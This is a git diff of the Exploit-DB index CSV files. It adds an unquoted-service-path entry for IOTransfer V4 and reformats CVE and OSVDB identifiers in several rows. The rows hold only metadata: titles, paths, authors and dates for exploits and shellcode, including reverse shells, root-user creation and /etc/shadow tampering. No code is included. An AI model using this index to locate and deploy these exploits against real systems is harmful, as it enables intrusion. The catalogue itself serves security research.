@@ -39666,6 +39671,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49371,exploits/windows/local/49371.txt,"IObit Uninstaller 10 Pro - Unquoted Service Path",2021-01-06,"Mayur Parmar",local,windows,,2021-01-06,2021-01-06,0,,,,,, 47538,exploits/windows/local/47538.txt,"IObit Uninstaller 9.1.0.8 - 'IObitUnSvr' Unquoted Service Path",2019-10-23,"Sainadh Jamalpur",local,windows,,2019-10-23,2019-10-23,0,,,,,, 48543,exploits/windows/local/48543.txt,"IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path",2020-06-04,Gobinathan,local,windows,,2020-06-04,2020-06-04,0,,,,,, +51029,exploits/windows/local/51029.txt,"IOTransfer V4 - Unquoted Service Path",2022-11-11,"BLAY ABU SAFIAN",local,windows,,2022-11-11,2022-11-11,0,CVE-2022-37197,,,,, 48968,exploits/windows/local/48968.txt,"IP Watcher v3.0.0.30 - 'PACService.exe' Unquoted Service Path",2020-10-28,"Mohammed Alshehri",local,windows,,2020-10-28,2020-10-28,0,,,,,, 46334,exploits/windows/local/46334.py,"IP-Tools 2.5 - 'Log to file' Local Buffer Overflow (SEH) (Egghunter)",2019-02-11,"Juan Prescotto",local,windows,,2019-02-11,2019-04-30,0,,Local,,,http://www.exploit-db.comip-tools.exe, 46334,exploits/windows/local/46334.py,"IP-Tools 2.5 - 'Log to file' Local Buffer Overflow (SEH) (Egghunter)",2019-02-11,"Juan Prescotto",local,windows,,2019-02-11,2019-04-30,0,,"Buffer Overflow",,,http://www.exploit-db.comip-tools.exe, 
@@ -43751,7 +43757,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 34831,exploits/windows/remote/34831.c,"NetStumbler 0.4 - 'mfc71esn.dll' DLL Loading Arbitrary Code Execution",2010-10-10,Pepelux,remote,windows,,2010-10-10,2014-10-01,1,,,,,,https://www.securityfocus.com/bid/43913/info 22909,exploits/windows/remote/22909.txt,"NetSuite 1.0/1.2 - HTTP Server Directory Traversal",2003-07-15,dr_insane,remote,windows,,2003-07-15,2012-11-25,1,,,,,,https://www.securityfocus.com/bid/8197/info 16735,exploits/windows/remote/16735.rb,"NetTerm NetFTPD - 'USER' Remote Buffer Overflow (Metasploit)",2010-10-05,Metasploit,remote,windows,,2010-10-05,2017-10-05,1,CVE-2005-1323;OSVDB-15865,"Metasploit Framework (MSF)",,,, -43408,exploits/windows/remote/43408.py,"NetTransport 2.96L - Remote Buffer Overflow (DEP Bypass)",2017-12-29,"Aloyce J. Makalanga",remote,windows,,2017-12-29,2018-01-10,0,CVE-2017-17968,,,,http://www.exploit-db.comNXSetup_x86.zip, +43408,exploits/windows/remote/43408.py,"NetTransport 2.96L - Remote Buffer Overflow (DEP Bypass)",2017-12-29,"Aloyce J. Makalanga",remote,windows,,2017-12-29,2022-11-11,0,CVE-2017-17968,,,,http://www.exploit-db.comNXSetup_x86.zip, 16439,exploits/windows/remote/16439.rb,"NetTransport Download Manager 2.90.510 - Remote Buffer Overflow (Metasploit)",2010-08-25,Metasploit,remote,windows,,2010-08-25,2011-03-10,1,OSVDB-61435,"Metasploit Framework (MSF)",,,, 10911,exploits/windows/remote/10911.py,"NetTransport Download Manager 2.90.510 - Remote Overflow (SEH)",2010-01-02,Lincoln,remote,windows,,2010-01-01,2017-11-15,1,OSVDB-61435,,,,http://www.exploit-db.comNXSetup_Vista_x86_.zip, 19895,exploits/windows/remote/19895.txt,"NetWin DNews 5.3 Server - Remote Buffer Overflow",2000-03-01,Joey__,remote,windows,,2000-03-01,2012-07-22,1,OSVDB-13683;CVE-2000-0423,,,,,https://www.securityfocus.com/bid/1172/info diff --git a/files_shellcodes.csv b/files_shellcodes.csv index ccfe93585..51216d82f 100644 
--- a/files_shellcodes.csv +++ b/files_shellcodes.csv 
@@ -199,13 +199,13 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
 36274,shellcodes/linux_mips/36274.c,"Linux/MIPS (Little Endian) - chmod(/etc/shadow 666) Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",,linux_mips,55,2015-03-05,2017-08-22,0,,,,,,
 13300,shellcodes/linux_mips/13300.c,"Linux/MIPS (Little Endian) - execve(/bin/sh) Shellcode (56 bytes)",2005-11-09,core,,linux_mips,56,2005-11-08,2018-01-12,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-79.php
 29436,shellcodes/linux_mips/29436.asm,"Linux/MIPS (Little Endian) - Reverse (192.168.1.177:31337/TCP) Shell (/bin/sh) Shellcode (200 bytes)",2013-11-04,"Jacob Holcomb",,linux_mips,200,2013-11-08,2016-09-12,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-860.php
-27132,shellcodes/linux_mips/27132.txt,"Linux/MIPS (Little Endian) - system(telnetd -l /bin/sh) Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",,linux_mips,80,2013-07-27,2018-01-12,0,2013-4659;95778,,,,,
+27132,shellcodes/linux_mips/27132.txt,"Linux/MIPS (Little Endian) - system(telnetd -l /bin/sh) Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",,linux_mips,80,2013-07-27,2018-01-12,0,CVE-2013-4659;OSVDB-95778,,,,,
 18163,shellcodes/linux_mips/18163.c,"Linux/MIPS - Add Root User (rOOt/pwn3d) To /etc/passwd Shellcode (164 bytes)",2011-11-27,rigan,,linux_mips,164,2011-11-27,2018-01-17,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-793.php
 35868,shellcodes/linux_mips/35868.c,"Linux/MIPS - execve(/bin/sh) Shellcode (36 bytes)",2015-01-22,Sanguine,,linux_mips,36,2015-02-03,2019-03-07,0,,,,http://www.exploit-db.com/screenshots/idlt36000/download-attachment.png,,
 18162,shellcodes/linux_mips/18162.c,"Linux/MIPS - execve(/bin/sh) Shellcode (48 bytes)",2011-11-27,rigan,,linux_mips,48,2011-11-27,2011-11-27,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-792.php
 17940,shellcodes/linux_mips/17940.c,"Linux/MIPS - execve(/bin/sh) Shellcode (52 bytes)",2011-10-07,entropy,,linux_mips,52,2011-10-07,2018-01-12,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-782.php
 50751,shellcodes/linux_mips/50751.c,"Linux/MIPS - N32 MSB Reverse Shell Shellcode",2022-02-18,"Marco Ivaldi",,linux_mips,,2022-02-18,2022-02-18,0,,,,,,
-18227,shellcodes/linux_mips/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,,linux_mips,32,2011-12-10,2011-12-10,0,83189,,,,,http://shell-storm.org/shellcode/files/shellcode-795.php
+18227,shellcodes/linux_mips/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,,linux_mips,32,2011-12-10,2011-12-10,0,OSVDB-83189,,,,,http://shell-storm.org/shellcode/files/shellcode-795.php
 18226,shellcodes/linux_mips/18226.c,"Linux/MIPS - Reverse (0x7a69/TCP) Shell Shellcode (168 bytes)",2011-12-10,rigan,,linux_mips,168,2011-12-10,2011-12-10,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-794.php
 45287,shellcodes/linux_mips/45287.c,"Linux/MIPS64 - execve(/bin/sh) Shellcode (48 bytes)",2018-08-29,antonio,,linux_mips,,2018-08-29,2018-08-29,0,,,,,,
 13304,shellcodes/linux_ppc/13304.c,"Linux/PPC - execve(/bin/sh) Shellcode (112 bytes)",2004-09-12,Palante,,linux_ppc,112,2004-09-11,,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-89.php
@@ -461,7 +461,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
 46277,shellcodes/linux_x86/46277.c,"Linux/x86 - execve(/bin/sh) + RShift-1 Encoded Shellcode (29 bytes)",2019-01-29,"Joao Batista",,linux_x86,29,2019-01-29,2019-01-29,0,,,,,,
 13447,shellcodes/linux_x86/13447.c,"Linux/x86 - execve(/bin/sh) + setreuid(12_12) Shellcode (50 bytes)",2004-09-12,anonymous,,linux_x86,50,2004-09-11,,1,,,,,,
 42177,shellcodes/linux_x86/42177.c,"Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) + XOR Encoded Shellcode (66 bytes)",2017-06-15,nullparasite,,linux_x86,66,2017-06-15,2017-07-04,0,,,,,,
-34060,shellcodes/linux_x86/34060.c,"Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes)",2014-07-14,ZadYree,,linux_x86,50,2014-07-22,2017-08-23,1,2014-4943;109277,,,,,http://shell-storm.org/shellcode/files/shellcode-881.php
+34060,shellcodes/linux_x86/34060.c,"Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes)",2014-07-14,ZadYree,,linux_x86,50,2014-07-22,2017-08-23,1,CVE-2014-4943;OSVDB-109277,,,,,http://shell-storm.org/shellcode/files/shellcode-881.php
 13409,shellcodes/linux_x86/13409.c,"Linux/x86 - execve(/bin/sh) + Standard Opcode Array Payload Shellcode (21 bytes)",2005-09-15,c0ntex,,linux_x86,21,2005-09-14,2018-01-17,1,,,,,,
 13412,shellcodes/linux_x86/13412.c,"Linux/x86 - execve(/bin/sh) + sysenter Opcode Array Payload Shellcode (23 bytes)",2005-09-04,BaCkSpAcE,,linux_x86,23,2005-09-03,,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-236.php
 13413,shellcodes/linux_x86/13413.c,"Linux/x86 - execve(/bin/sh) + sysenter Opcode Array Payload Shellcode (27 bytes)",2005-08-25,amnesia,,linux_x86,27,2005-08-24,,1,,,,,,
@@ -678,7 +678,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
 18294,shellcodes/linux_x86/18294.c,"Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + No Password + Polymorphic Shellcode",2011-12-31,pentesters.ir,,linux_x86,,2011-12-31,2018-01-17,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-798.php
 13342,shellcodes/linux_x86/13342.c,"Linux/x86 - setuid(0) + setgid(0) + aslr_off (Disable ASLR Security) Shellcode (79 bytes)",2008-08-18,LiquidWorm,,linux_x86,79,2008-08-17,2018-01-16,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-222.php
 13728,shellcodes/linux_x86/13728.c,"Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh) Shellcode (39 bytes)",2010-06-01,gunslinger_,,linux_x86,39,2010-05-31,2017-07-04,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-631.php
-13378,shellcodes/linux_x86/13378.c,"Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_ [/bin/sh_ NULL]) Shellcode (37 bytes)",2006-04-03,"Gotfault Security",,linux_x86,37,2006-04-02,2018-01-16,1,65252,,,,,http://shell-storm.org/shellcode/files/shellcode-251.php
+13378,shellcodes/linux_x86/13378.c,"Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_ [/bin/sh_ NULL]) Shellcode (37 bytes)",2006-04-03,"Gotfault Security",,linux_x86,37,2006-04-02,2018-01-16,1,OSVDB-65252,,,,,http://shell-storm.org/shellcode/files/shellcode-251.php
 43652,shellcodes/linux_x86/43652.c,"Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_[/bin/sh_NULL])) Shellcode (25 bytes)",2009-06-23,TheWorm,,linux_x86,33,2018-01-16,2018-01-16,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-473.php
 43751,shellcodes/linux_x86/43751.asm,"Linux/x86 - shift-bit execve() Encoder Shellcode (114 bytes)",2009-01-01,"Shihao Song",,linux_x86,114,2018-01-18,2018-01-18,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-868.php
 46801,shellcodes/linux_x86/46801.txt,"Linux/x86 - Shred File (test.txt) Shellcode (72 bytes)",2019-05-06,strider,,linux_x86,72,2019-05-06,2019-05-23,0,,,,,,
@@ -1028,7 +1028,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
 48116,shellcodes/windows_x86/48116.c,"Windows/x86 - WinExec Calc.exe + Null-Free Shellcode (195 bytes)",2020-02-24,boku,,windows_x86,,2020-02-24,2020-03-23,0,,,,,,
 50368,shellcodes/windows_x86/50368.c,"Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)",2021-10-01,"Daniel Ortiz",,windows_x86,,2021-10-01,2021-10-29,0,,,,,,
 39900,shellcodes/windows_x86/39900.c,"Windows/x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",,windows_x86,184,2016-06-07,2016-09-05,0,,,,,,
-14288,shellcodes/windows_x86/14288.asm,"Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",,windows_x86,278,2010-07-09,2017-08-24,1,2010-0425,,,,,http://shell-storm.org/shellcode/files/shellcode-681.php
+14288,shellcodes/windows_x86/14288.asm,"Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",,windows_x86,278,2010-07-09,2017-08-24,1,CVE-2010-0425,,,,,http://shell-storm.org/shellcode/files/shellcode-681.php
 41827,shellcodes/windows_x86-64/41827.asm,"Windows/x64 (10) - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",,windows_x86-64,45,2017-04-06,2017-04-06,0,,,,,,
 45293,shellcodes/windows_x86-64/45293.c,"Windows/x64 (10) - WoW64 Egghunter (w00tw00t) Shellcode (50 bytes)",2018-08-29,n30m1nd,,windows_x86-64,50,2018-08-29,2018-09-08,0,,,,,,
 37895,shellcodes/windows_x86-64/37895.asm,"Windows/x64 (2003) - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",,windows_x86-64,59,2015-08-20,2015-08-20,0,,,,,,